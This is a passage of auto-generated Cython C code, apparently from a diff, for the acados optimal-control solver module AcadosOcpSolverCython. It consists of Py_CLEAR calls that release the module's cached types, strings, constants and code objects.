Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_inexact); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_floating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_complexfloating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flexible); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_character); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ufunc); + Py_CLEAR(clear_module_state->__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + Py_CLEAR(clear_module_state->__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + Py_CLEAR(clear_module_state->__pyx_array_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_array); + Py_CLEAR(clear_module_state->__pyx_MemviewEnum_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_MemviewEnum); + Py_CLEAR(clear_module_state->__pyx_memoryview_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_memoryview); + Py_CLEAR(clear_module_state->__pyx_memoryviewslice_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_memoryviewslice); + Py_CLEAR(clear_module_state->__pyx_kp_u_); + Py_CLEAR(clear_module_state->__pyx_n_s_ASCII); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___get_poin); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat_3); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___reduce_c); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython___setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython__get_poin); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat_3); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_constraint); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_constraint_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_cost_set); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_cost_set_m); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_does_not_s); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_dynamics_g); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_eval_param); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_eval_param_3); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_get); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_get_cost); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_field); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_is_an); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_get_residu); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_stage); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_get_stats); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_load_itera); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_options_se); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_options_se_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_print_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_reset); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_set); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_set_is_not); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_set_mismat); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_set_new_ti); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_solve); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_solve_argu); + Py_CLEAR(clear_module_state->__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_store_iter); + Py_CLEAR(clear_module_state->__pyx_n_s_AcadosOcpSolverCython_update_qp); + Py_CLEAR(clear_module_state->__pyx_kp_s_All_dimensions_preceding_dimensi); + Py_CLEAR(clear_module_state->__pyx_n_s_AssertionError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Buffer_view_does_not_expose_stri); + Py_CLEAR(clear_module_state->__pyx_kp_s_Can_only_create_a_buffer_that_is); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_assign_to_read_only_memor); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_create_writable_memory_vi); + Py_CLEAR(clear_module_state->__pyx_kp_u_Cannot_index_with_type); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_transpose_memoryview_with); + Py_CLEAR(clear_module_state->__pyx_kp_s_Dimension_d_is_not_direct); + Py_CLEAR(clear_module_state->__pyx_n_s_Ellipsis); + Py_CLEAR(clear_module_state->__pyx_kp_s_Empty_shape_tuple_for_cython_arr); + Py_CLEAR(clear_module_state->__pyx_n_u_F); + Py_CLEAR(clear_module_state->__pyx_n_s_ImportError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_CLEAR(clear_module_state->__pyx_n_s_IndexError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Index_out_of_bounds_axis_d); + Py_CLEAR(clear_module_state->__pyx_kp_s_Indirect_dimensions_not_supporte); + Py_CLEAR(clear_module_state->__pyx_kp_u_Invalid_mode_expected_c_or_fortr); + Py_CLEAR(clear_module_state->__pyx_kp_u_Invalid_shape_in_axis); + Py_CLEAR(clear_module_state->__pyx_n_s_MemoryError); + Py_CLEAR(clear_module_state->__pyx_kp_s_MemoryView_of_r_at_0x_x); + Py_CLEAR(clear_module_state->__pyx_kp_s_MemoryView_of_r_object); + Py_CLEAR(clear_module_state->__pyx_n_s_N); + Py_CLEAR(clear_module_state->__pyx_kp_u_None); + Py_CLEAR(clear_module_state->__pyx_n_s_NotImplementedError); + Py_CLEAR(clear_module_state->__pyx_n_b_O); + Py_CLEAR(clear_module_state->__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + Py_CLEAR(clear_module_state->__pyx_n_s_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_u_SQP); + Py_CLEAR(clear_module_state->__pyx_n_u_SQP_RTI); + Py_CLEAR(clear_module_state->__pyx_n_s_Sequence); + Py_CLEAR(clear_module_state->__pyx_kp_s_Step_may_not_be_zero_axis_d); + Py_CLEAR(clear_module_state->__pyx_kp_u_TODO); + Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Unable_to_convert_item_to_object); + Py_CLEAR(clear_module_state->__pyx_n_s_ValueError); + Py_CLEAR(clear_module_state->__pyx_n_s_View_MemoryView); + Py_CLEAR(clear_module_state->__pyx_kp_u_Y_m_d_H_M_S_f); + Py_CLEAR(clear_module_state->__pyx_kp_u__14); + Py_CLEAR(clear_module_state->__pyx_n_u__15); + Py_CLEAR(clear_module_state->__pyx_kp_u__2); + Py_CLEAR(clear_module_state->__pyx_kp_u__29); + Py_CLEAR(clear_module_state->__pyx_n_s__3); + Py_CLEAR(clear_module_state->__pyx_kp_u__6); + Py_CLEAR(clear_module_state->__pyx_kp_u__7); + Py_CLEAR(clear_module_state->__pyx_n_s__84); + Py_CLEAR(clear_module_state->__pyx_n_s_abc); + Py_CLEAR(clear_module_state->__pyx_n_s_acados_template_acados_ocp_solve); + Py_CLEAR(clear_module_state->__pyx_n_s_allocate_buffer); + Py_CLEAR(clear_module_state->__pyx_n_u_alpha); + Py_CLEAR(clear_module_state->__pyx_n_u_alpha_min); + Py_CLEAR(clear_module_state->__pyx_n_u_alpha_reduction); + Py_CLEAR(clear_module_state->__pyx_kp_u_alpha_values_are_not_available_f); + Py_CLEAR(clear_module_state->__pyx_kp_u_and); + Py_CLEAR(clear_module_state->__pyx_n_s_array); + Py_CLEAR(clear_module_state->__pyx_n_s_ascontiguousarray); + Py_CLEAR(clear_module_state->__pyx_n_s_asfortranarray); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_kp_u_at_stage); + Py_CLEAR(clear_module_state->__pyx_n_s_base); + Py_CLEAR(clear_module_state->__pyx_n_s_c); + Py_CLEAR(clear_module_state->__pyx_n_u_c); + Py_CLEAR(clear_module_state->__pyx_n_s_class); + Py_CLEAR(clear_module_state->__pyx_n_s_class_getitem); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_collections); + Py_CLEAR(clear_module_state->__pyx_kp_s_collections_abc); + Py_CLEAR(clear_module_state->__pyx_n_s_constraints_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_constraints_set); + Py_CLEAR(clear_module_state->__pyx_kp_s_contiguous_and_direct); + Py_CLEAR(clear_module_state->__pyx_kp_s_contiguous_and_indirect); + Py_CLEAR(clear_module_state->__pyx_n_s_cost_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_cost_set); + Py_CLEAR(clear_module_state->__pyx_n_s_count); + Py_CLEAR(clear_module_state->__pyx_n_s_datetime); + Py_CLEAR(clear_module_state->__pyx_n_s_default); + Py_CLEAR(clear_module_state->__pyx_n_s_dict); + Py_CLEAR(clear_module_state->__pyx_n_s_dims); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_n_s_double_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_double_value); + Py_CLEAR(clear_module_state->__pyx_n_s_dtype); + Py_CLEAR(clear_module_state->__pyx_n_s_dtype_is_object); + Py_CLEAR(clear_module_state->__pyx_n_s_dump); + Py_CLEAR(clear_module_state->__pyx_n_s_dynamics_get); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_n_s_encode); + Py_CLEAR(clear_module_state->__pyx_n_s_enter); + Py_CLEAR(clear_module_state->__pyx_n_s_enumerate); + Py_CLEAR(clear_module_state->__pyx_n_u_eps_sufficient_descent); + Py_CLEAR(clear_module_state->__pyx_n_s_error); + Py_CLEAR(clear_module_state->__pyx_n_s_eval_param_sens); + Py_CLEAR(clear_module_state->__pyx_n_u_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_exit); + Py_CLEAR(clear_module_state->__pyx_n_s_f); + Py_CLEAR(clear_module_state->__pyx_n_s_field); + Py_CLEAR(clear_module_state->__pyx_n_s_field_2); + Py_CLEAR(clear_module_state->__pyx_n_s_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_filename); + Py_CLEAR(clear_module_state->__pyx_n_s_flags); + Py_CLEAR(clear_module_state->__pyx_n_s_float64); + Py_CLEAR(clear_module_state->__pyx_kp_u_for_field); + Py_CLEAR(clear_module_state->__pyx_n_s_format); + Py_CLEAR(clear_module_state->__pyx_n_s_fortran); + Py_CLEAR(clear_module_state->__pyx_n_u_fortran); + Py_CLEAR(clear_module_state->__pyx_n_s_full_stats); + Py_CLEAR(clear_module_state->__pyx_n_u_full_step_dual); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_get); + Py_CLEAR(clear_module_state->__pyx_n_s_get_cost); + Py_CLEAR(clear_module_state->__pyx_n_s_get_pointers_solver); + Py_CLEAR(clear_module_state->__pyx_n_s_get_residuals); + Py_CLEAR(clear_module_state->__pyx_n_s_get_stat_double); + Py_CLEAR(clear_module_state->__pyx_n_s_get_stat_int); + Py_CLEAR(clear_module_state->__pyx_n_s_get_stat_matrix); + Py_CLEAR(clear_module_state->__pyx_n_s_get_stats); + Py_CLEAR(clear_module_state->__pyx_n_s_getcwd); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_n_u_globalization); + Py_CLEAR(clear_module_state->__pyx_n_u_globalization_use_SOC); + Py_CLEAR(clear_module_state->__pyx_kp_u_got); + Py_CLEAR(clear_module_state->__pyx_kp_u_got_differing_extents_in_dimensi); + Py_CLEAR(clear_module_state->__pyx_n_s_i); + Py_CLEAR(clear_module_state->__pyx_n_s_id); + Py_CLEAR(clear_module_state->__pyx_n_s_import); + Py_CLEAR(clear_module_state->__pyx_n_s_indent); + Py_CLEAR(clear_module_state->__pyx_n_s_index); + Py_CLEAR(clear_module_state->__pyx_n_u_initialize_t_slacks); + Py_CLEAR(clear_module_state->__pyx_n_s_initializing); + Py_CLEAR(clear_module_state->__pyx_n_s_int); + Py_CLEAR(clear_module_state->__pyx_n_s_int_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_int_value); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_isfile); + Py_CLEAR(clear_module_state->__pyx_n_s_itemsize); + Py_CLEAR(clear_module_state->__pyx_kp_s_itemsize_0_for_cython_array); + Py_CLEAR(clear_module_state->__pyx_n_u_iterate); + Py_CLEAR(clear_module_state->__pyx_n_s_join); + Py_CLEAR(clear_module_state->__pyx_n_s_json); + Py_CLEAR(clear_module_state->__pyx_kp_u_json_2); + Py_CLEAR(clear_module_state->__pyx_n_s_key); + Py_CLEAR(clear_module_state->__pyx_n_s_keys); + Py_CLEAR(clear_module_state->__pyx_n_u_lam); + Py_CLEAR(clear_module_state->__pyx_n_u_lam_2); + Py_CLEAR(clear_module_state->__pyx_n_u_lbu); + Py_CLEAR(clear_module_state->__pyx_n_u_lbx); + Py_CLEAR(clear_module_state->__pyx_n_u_line_search_use_sufficient_desce); + Py_CLEAR(clear_module_state->__pyx_n_s_load); + Py_CLEAR(clear_module_state->__pyx_n_s_load_iterate); + Py_CLEAR(clear_module_state->__pyx_kp_u_load_iterate_failed_file_does_no); + Py_CLEAR(clear_module_state->__pyx_n_s_m); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_mem_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_memview); + Py_CLEAR(clear_module_state->__pyx_n_s_min_size); + Py_CLEAR(clear_module_state->__pyx_n_s_mode); + Py_CLEAR(clear_module_state->__pyx_n_s_model_name); + Py_CLEAR(clear_module_state->__pyx_n_s_msg); + Py_CLEAR(clear_module_state->__pyx_n_s_n); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_name_2); + Py_CLEAR(clear_module_state->__pyx_n_s_ndim); + Py_CLEAR(clear_module_state->__pyx_n_s_new); + Py_CLEAR(clear_module_state->__pyx_n_s_new_time_steps); + Py_CLEAR(clear_module_state->__pyx_n_s_nlp_solver_type); + Py_CLEAR(clear_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_CLEAR(clear_module_state->__pyx_n_s_np); + Py_CLEAR(clear_module_state->__pyx_n_s_numpy); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_CLEAR(clear_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_CLEAR(clear_module_state->__pyx_n_s_nx); + Py_CLEAR(clear_module_state->__pyx_n_s_obj); + Py_CLEAR(clear_module_state->__pyx_n_s_open); + Py_CLEAR(clear_module_state->__pyx_n_s_options_set); + Py_CLEAR(clear_module_state->__pyx_n_s_order); + Py_CLEAR(clear_module_state->__pyx_n_s_os); + Py_CLEAR(clear_module_state->__pyx_n_s_out); + Py_CLEAR(clear_module_state->__pyx_n_s_out_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_out_mat); + Py_CLEAR(clear_module_state->__pyx_n_s_overwrite); + Py_CLEAR(clear_module_state->__pyx_n_u_p); + Py_CLEAR(clear_module_state->__pyx_n_s_pack); + Py_CLEAR(clear_module_state->__pyx_n_s_path); + Py_CLEAR(clear_module_state->__pyx_n_u_pi); + Py_CLEAR(clear_module_state->__pyx_n_u_pi_2); + Py_CLEAR(clear_module_state->__pyx_n_s_pickle); + Py_CLEAR(clear_module_state->__pyx_n_s_print); + Py_CLEAR(clear_module_state->__pyx_n_u_print_level); + Py_CLEAR(clear_module_state->__pyx_n_s_print_statistics); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_checksum); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_result); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_type); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_unpickle_Enum); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_vtable); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_iter); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_mu0); + Py_CLEAR(clear_module_state->__pyx_n_s_qp_solver_cond_N); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tau_min); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tol_comp); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tol_eq); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tol_ineq); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tol_stat); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_warm_start); + Py_CLEAR(clear_module_state->__pyx_n_u_r); + Py_CLEAR(clear_module_state->__pyx_n_s_range); + Py_CLEAR(clear_module_state->__pyx_n_s_recompute); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_register); + Py_CLEAR(clear_module_state->__pyx_n_b_res_comp); + Py_CLEAR(clear_module_state->__pyx_n_b_res_eq); + Py_CLEAR(clear_module_state->__pyx_n_b_res_ineq); + Py_CLEAR(clear_module_state->__pyx_n_b_res_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_reset); + Py_CLEAR(clear_module_state->__pyx_n_u_residuals); + Py_CLEAR(clear_module_state->__pyx_n_u_rti_phase); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_n_s_set); + Py_CLEAR(clear_module_state->__pyx_n_s_set_new_time_steps); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_shape); + Py_CLEAR(clear_module_state->__pyx_n_s_size); + Py_CLEAR(clear_module_state->__pyx_n_u_sl); + Py_CLEAR(clear_module_state->__pyx_n_u_sl_2); + Py_CLEAR(clear_module_state->__pyx_n_s_solution); + Py_CLEAR(clear_module_state->__pyx_n_s_solve); + Py_CLEAR(clear_module_state->__pyx_kp_u_solver_option_must_be_of_type_fl); + Py_CLEAR(clear_module_state->__pyx_kp_u_solver_option_must_be_of_type_in); + Py_CLEAR(clear_module_state->__pyx_kp_u_solver_option_must_be_of_type_st); + Py_CLEAR(clear_module_state->__pyx_n_s_sort_keys); + Py_CLEAR(clear_module_state->__pyx_n_s_spec); + Py_CLEAR(clear_module_state->__pyx_n_s_split); + Py_CLEAR(clear_module_state->__pyx_n_s_sqp_iter); + Py_CLEAR(clear_module_state->__pyx_n_u_sqp_iter); + Py_CLEAR(clear_module_state->__pyx_n_s_stage); + Py_CLEAR(clear_module_state->__pyx_n_s_start); + Py_CLEAR(clear_module_state->__pyx_n_s_stat_m); + Py_CLEAR(clear_module_state->__pyx_n_u_stat_m); + Py_CLEAR(clear_module_state->__pyx_n_s_stat_n); + Py_CLEAR(clear_module_state->__pyx_n_u_stat_n); + Py_CLEAR(clear_module_state->__pyx_n_u_statistics); + Py_CLEAR(clear_module_state->__pyx_n_s_step); + Py_CLEAR(clear_module_state->__pyx_n_u_step_length); + Py_CLEAR(clear_module_state->__pyx_n_s_stop); + Py_CLEAR(clear_module_state->__pyx_n_s_store_iterate); + Py_CLEAR(clear_module_state->__pyx_n_s_store_iterate_locals_lambda); + Py_CLEAR(clear_module_state->__pyx_kp_u_stored_current_iterate_in); + Py_CLEAR(clear_module_state->__pyx_n_s_strftime); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_direct); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_direct_or_indirect); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_indirect); + Py_CLEAR(clear_module_state->__pyx_n_s_string_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_string_value); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_struct); + Py_CLEAR(clear_module_state->__pyx_n_u_su); + Py_CLEAR(clear_module_state->__pyx_n_u_su_2); + Py_CLEAR(clear_module_state->__pyx_n_s_sys); + Py_CLEAR(clear_module_state->__pyx_n_u_t); + Py_CLEAR(clear_module_state->__pyx_n_u_t_2); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_kp_s_third_party_acados_acados_templa); + Py_CLEAR(clear_module_state->__pyx_n_u_time_glob); + Py_CLEAR(clear_module_state->__pyx_n_u_time_lin); + Py_CLEAR(clear_module_state->__pyx_n_u_time_qp); + Py_CLEAR(clear_module_state->__pyx_n_u_time_qp_solver_call); + Py_CLEAR(clear_module_state->__pyx_n_u_time_qp_xcond); + Py_CLEAR(clear_module_state->__pyx_n_u_time_reg); + Py_CLEAR(clear_module_state->__pyx_n_u_time_sim); + Py_CLEAR(clear_module_state->__pyx_n_u_time_sim_ad); + Py_CLEAR(clear_module_state->__pyx_n_u_time_sim_la); + Py_CLEAR(clear_module_state->__pyx_n_u_time_solution_sensitivities); + Py_CLEAR(clear_module_state->__pyx_n_u_time_tot); + Py_CLEAR(clear_module_state->__pyx_n_u_tol_comp); + Py_CLEAR(clear_module_state->__pyx_n_u_tol_eq); + Py_CLEAR(clear_module_state->__pyx_n_u_tol_ineq); + Py_CLEAR(clear_module_state->__pyx_n_u_tol_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_tolist); + Py_CLEAR(clear_module_state->__pyx_n_u_u); + Py_CLEAR(clear_module_state->__pyx_n_u_u_2); + Py_CLEAR(clear_module_state->__pyx_n_u_ubu); + Py_CLEAR(clear_module_state->__pyx_n_u_ubx); + Py_CLEAR(clear_module_state->__pyx_kp_s_unable_to_allocate_array_data); + Py_CLEAR(clear_module_state->__pyx_kp_s_unable_to_allocate_shape_and_str); + Py_CLEAR(clear_module_state->__pyx_n_s_unpack); + Py_CLEAR(clear_module_state->__pyx_n_s_update); + Py_CLEAR(clear_module_state->__pyx_n_s_update_qp_solver_cond_N); + Py_CLEAR(clear_module_state->__pyx_n_s_utcnow); + Py_CLEAR(clear_module_state->__pyx_kp_u_utf_8); + Py_CLEAR(clear_module_state->__pyx_n_s_value); + Py_CLEAR(clear_module_state->__pyx_n_s_value_2); + Py_CLEAR(clear_module_state->__pyx_n_s_value_shape); + Py_CLEAR(clear_module_state->__pyx_n_s_version_info); + Py_CLEAR(clear_module_state->__pyx_n_u_w); + Py_CLEAR(clear_module_state->__pyx_n_u_warm_start_first_qp); + Py_CLEAR(clear_module_state->__pyx_kp_u_with_dimension); + Py_CLEAR(clear_module_state->__pyx_kp_u_with_dimension_you_have); + Py_CLEAR(clear_module_state->__pyx_n_b_x); + Py_CLEAR(clear_module_state->__pyx_n_s_x); + Py_CLEAR(clear_module_state->__pyx_n_u_x); + Py_CLEAR(clear_module_state->__pyx_n_u_x_2); + Py_CLEAR(clear_module_state->__pyx_n_u_xdot_guess); + Py_CLEAR(clear_module_state->__pyx_n_u_y_ref); + Py_CLEAR(clear_module_state->__pyx_kp_u_you_have); + Py_CLEAR(clear_module_state->__pyx_n_u_yref); + Py_CLEAR(clear_module_state->__pyx_n_u_z); + Py_CLEAR(clear_module_state->__pyx_n_u_z_2); + Py_CLEAR(clear_module_state->__pyx_n_u_z_guess); + Py_CLEAR(clear_module_state->__pyx_n_s_zeros); + Py_CLEAR(clear_module_state->__pyx_int_0); + Py_CLEAR(clear_module_state->__pyx_int_1); + Py_CLEAR(clear_module_state->__pyx_int_2); + Py_CLEAR(clear_module_state->__pyx_int_3); + Py_CLEAR(clear_module_state->__pyx_int_4); + Py_CLEAR(clear_module_state->__pyx_int_6); + Py_CLEAR(clear_module_state->__pyx_int_7); + Py_CLEAR(clear_module_state->__pyx_int_112105877); + Py_CLEAR(clear_module_state->__pyx_int_136983863); + Py_CLEAR(clear_module_state->__pyx_int_184977713); + Py_CLEAR(clear_module_state->__pyx_int_neg_1); + Py_CLEAR(clear_module_state->__pyx_int_neg_5); + Py_CLEAR(clear_module_state->__pyx_slice__5); + Py_CLEAR(clear_module_state->__pyx_tuple__4); + Py_CLEAR(clear_module_state->__pyx_tuple__8); + Py_CLEAR(clear_module_state->__pyx_tuple__9); + Py_CLEAR(clear_module_state->__pyx_slice__16); + Py_CLEAR(clear_module_state->__pyx_tuple__10); + Py_CLEAR(clear_module_state->__pyx_tuple__11); + Py_CLEAR(clear_module_state->__pyx_tuple__12); + Py_CLEAR(clear_module_state->__pyx_tuple__13); + Py_CLEAR(clear_module_state->__pyx_tuple__17); + Py_CLEAR(clear_module_state->__pyx_tuple__18); + Py_CLEAR(clear_module_state->__pyx_tuple__19); + Py_CLEAR(clear_module_state->__pyx_tuple__20); + Py_CLEAR(clear_module_state->__pyx_tuple__21); + Py_CLEAR(clear_module_state->__pyx_tuple__22); + Py_CLEAR(clear_module_state->__pyx_tuple__23); + Py_CLEAR(clear_module_state->__pyx_tuple__24); + Py_CLEAR(clear_module_state->__pyx_tuple__25); + Py_CLEAR(clear_module_state->__pyx_tuple__26); + Py_CLEAR(clear_module_state->__pyx_tuple__27); + Py_CLEAR(clear_module_state->__pyx_tuple__28); + Py_CLEAR(clear_module_state->__pyx_tuple__30); + Py_CLEAR(clear_module_state->__pyx_tuple__31); + Py_CLEAR(clear_module_state->__pyx_tuple__32); + Py_CLEAR(clear_module_state->__pyx_tuple__33); + Py_CLEAR(clear_module_state->__pyx_tuple__34); + Py_CLEAR(clear_module_state->__pyx_tuple__35); + Py_CLEAR(clear_module_state->__pyx_tuple__36); + Py_CLEAR(clear_module_state->__pyx_tuple__37); + Py_CLEAR(clear_module_state->__pyx_tuple__38); + Py_CLEAR(clear_module_state->__pyx_tuple__39); + Py_CLEAR(clear_module_state->__pyx_tuple__41); + Py_CLEAR(clear_module_state->__pyx_tuple__45); + Py_CLEAR(clear_module_state->__pyx_tuple__47); + Py_CLEAR(clear_module_state->__pyx_tuple__49); + Py_CLEAR(clear_module_state->__pyx_tuple__51); + Py_CLEAR(clear_module_state->__pyx_tuple__52); + Py_CLEAR(clear_module_state->__pyx_tuple__55); + Py_CLEAR(clear_module_state->__pyx_tuple__57); + Py_CLEAR(clear_module_state->__pyx_tuple__58); + Py_CLEAR(clear_module_state->__pyx_tuple__60); + Py_CLEAR(clear_module_state->__pyx_tuple__62); + Py_CLEAR(clear_module_state->__pyx_tuple__65); + Py_CLEAR(clear_module_state->__pyx_tuple__67); + Py_CLEAR(clear_module_state->__pyx_tuple__69); + Py_CLEAR(clear_module_state->__pyx_tuple__71); + Py_CLEAR(clear_module_state->__pyx_tuple__72); + Py_CLEAR(clear_module_state->__pyx_tuple__74); + Py_CLEAR(clear_module_state->__pyx_tuple__77); + Py_CLEAR(clear_module_state->__pyx_tuple__79); + Py_CLEAR(clear_module_state->__pyx_tuple__82); + Py_CLEAR(clear_module_state->__pyx_codeobj__40); + Py_CLEAR(clear_module_state->__pyx_codeobj__42); + Py_CLEAR(clear_module_state->__pyx_codeobj__43); + Py_CLEAR(clear_module_state->__pyx_codeobj__44); + Py_CLEAR(clear_module_state->__pyx_codeobj__46); + Py_CLEAR(clear_module_state->__pyx_codeobj__48); + Py_CLEAR(clear_module_state->__pyx_codeobj__50); + Py_CLEAR(clear_module_state->__pyx_codeobj__53); + Py_CLEAR(clear_module_state->__pyx_codeobj__54); + Py_CLEAR(clear_module_state->__pyx_codeobj__56); + Py_CLEAR(clear_module_state->__pyx_codeobj__59); + Py_CLEAR(clear_module_state->__pyx_codeobj__61); + Py_CLEAR(clear_module_state->__pyx_codeobj__63); + Py_CLEAR(clear_module_state->__pyx_codeobj__64); + Py_CLEAR(clear_module_state->__pyx_codeobj__66); + Py_CLEAR(clear_module_state->__pyx_codeobj__68); + Py_CLEAR(clear_module_state->__pyx_codeobj__70); + Py_CLEAR(clear_module_state->__pyx_codeobj__73); + Py_CLEAR(clear_module_state->__pyx_codeobj__75); + Py_CLEAR(clear_module_state->__pyx_codeobj__76); + 